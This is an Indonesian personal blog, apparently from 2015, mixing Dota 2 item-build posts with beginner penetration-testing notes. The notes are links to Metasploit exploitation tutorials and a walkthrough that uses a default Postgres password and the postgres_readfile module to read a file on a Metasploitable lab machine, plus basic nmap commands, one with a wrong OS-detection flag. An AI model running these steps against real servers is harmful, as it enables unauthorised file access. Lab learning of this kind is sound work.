Jumat, 06 Maret 2015

DOTA 2 : Item Shadow Blade Untuk Hero Dengan Fungsi Support


Shadow Blade merupakan item yg berguna untuk menjadi tidak terlihat. Bagus untuk kabur dari kejaran musuh. Keadaan tidak terlihat juga tidak akan hilang walau kita memunculkan mantra & melakukan serangan.

ShadowBlade dibentuk dengan menyatukan:

Kamis, 05 Maret 2015

DOTA 2 : Strategi Item Build Agar Hero Support Mampu Bertahan Hidup Lebih Lama dalam Menjalankan Fungsinya Sebagai Support


Stategi ini melibatkan Bloodstone sebagai ultimate itemnya.

Energy Booster sangat bagus untuk meningkatkan kemampuan bertahan hidup hero support di medan tempur. Setelah membeli Kurir, 2 buah Botol, sebaiknya membeli Energy Booster, Point Booster, dan Vitality Booster. Ada 6 slot item di masing-masing Hero, jadi kalau kurir kan di beli tapi nggak masuk di slot. Yang masuk di SLOT cuma 2 botol, jadi masih ada ruang untuk Energy Booster, Vitality Booster, Point Booster. Nanti ketiga item ini akan bergabung menjadi Soul Booster.

Bahan-bahan Soul Booster:
  1. Energy Booster
  2. Vitality Booster
  3. Point Booster
Setelah memiliki Soul Booster. Sekarang saatnya membentuk Soul Ring. Yang Bahan-bahannya:
  1. Ring of Regen
  2. Sage's Mask
  3. Recipe

Item ultimatenya adalah Bloodstone. Bloodstone merupakan Gabungan antara Soul Booster + Soul Ring. Jadi dapatkan dulu Soul Booster, jika memungkinkan baru Soul Ring. Jika sudah keduanya akan membentuk BloodStone. Pokoknya ini strategi agar Hero support tetap bisa bertahan lama di medan tempur. Terhindar dari cepat mati. Dan bisa menjaga agar Hero carry tetap bisa hidup lebih lama.

Bahan-bahan Bloodstone:

Soul Booster
Soul Ring
Recipe

Senin, 23 Februari 2015

Metasploit : Link URL Tentang Penggunaan Metasploit

Link URL ke blog yg membahas tentang penggunaan Metasploit:

https://pentestlab.wordpress.com/2012/04/13/attacking-postgresql/


Scanning Port Menggunakan Metasploit:

https://pentestlab.wordpress.com/2012/02/



Tutorial Metasploit untuk Pemula. Diajarkan bagaimana cara mencari (search) exploit:

 https://jonathansblog.co.uk/metasploit-tutorial-for-beginners


Daftar Auxiliary dan penjelasan singkat mengenai apa itu auxiliary:

http://www.offensive-security.com/metasploit-unleashed/Auxiliary_Module_Reference


Cara mengekploitasi Tomcat server yg ada di OS Metasploitable 2:

http://colesec.inventedtheinternet.com/hacking-apache-tomcat/


http://www.securitygeeks.net/2013/05/attacking-metasploitable-apache-tomcat.html


http://www.tenable.com/plugins/index.php?view=single&id=32314


http://www.offensive-security.com/metasploit-unleashed/Admin_HTTP_Auxiliary_Modules


Scanner Metasploit untuk mengetahui kelemahan bertipe OpenSSL HeartBleed:


http://www.rapid7.com/db/modules/auxiliary/scanner/ssl/openssl_heartbleed


https://www.linkedin.com/pulse/20140502124621-24400980-how-to-run-heartbleed-attack


http://www.cisosecurity.org/?p=984


Menyerang OpenSSL di OS Metasploitable:

http://securitypadawan.blogspot.com/2011/10/attacking-metasploitable-part-2.html

http://kaoticcreations.blogspot.com/2012/08/exploiting-cve-2008-0166-debian-weak.html








Metasploit : Mencari Cara Mengekploitasi PostgreSQL

Dibawah ini salah satu referensi cara mengeksploitasi PostgreSQL server:

http://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload

http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt



Cara Membaca Isi File Di OS Metasploitable 2 Menggunakan Admin Postgres Auxiliary Modules


OS Target : Metasploitable 2 (Ubuntu Based)

OS Penyerang : Kali Linux

IP Target : 192.168.1.4

IP Penyerang : 192.168.1.2

Sumber Tutorial Referensi :



Dengan menggunakan postgres_readfile maka kita bisa membaca isi sebuah file. Dalam contoh ini saya menggunakan file sederhana berformat .txt . Sebelum menjalankan module Metasploit tersebut, saya membuat terlebih dahulu file bernama test.txt di lokasi:

/home/msfadmin

Saya membuatnya menggunakan text editor nano, isinya filenya berupa tulisan: haloooo .

Kemudian kita buka msfconsole di Kali Linux. Setelah masuk di msfconsole, langsung ketikan perintah berikut ini:

use auxiliary/admin/postgres/postgres_readfile

Kemudian ketikan perintah:

set PASSWORD postgres

set RFILE /home/msfadmin/test.txt

set RHOST 192.168.1.4

run

Maka akan muncul hasil:

Query Text: 'CREATE TEMP TABLE QLouHd (INPUT TEXT);
COPY QLouHd FROM '/home/msfadmin/test.txt';
SELECT * FROM QLouHd'
=================================================================================================================================
input
-----
haloooo









Download Presentasi

Minggu, 22 Februari 2015

NMAP: Perintah-perintah Untuk Scanning


Perintah NMAP untuk mengetahui jenis operating system di komputer target:

nmap -o IPTarget


TCP Port Scanning:

nmap -p T:NomerPort 192.168.1.2

UDP Port Scanning:

nmap -p U:NomerPort 192.168.1.2


Perintah untuk mengetahui type service yg berjalan di port itu:

nmap -sV -pT:NomerPort 192.168.1.2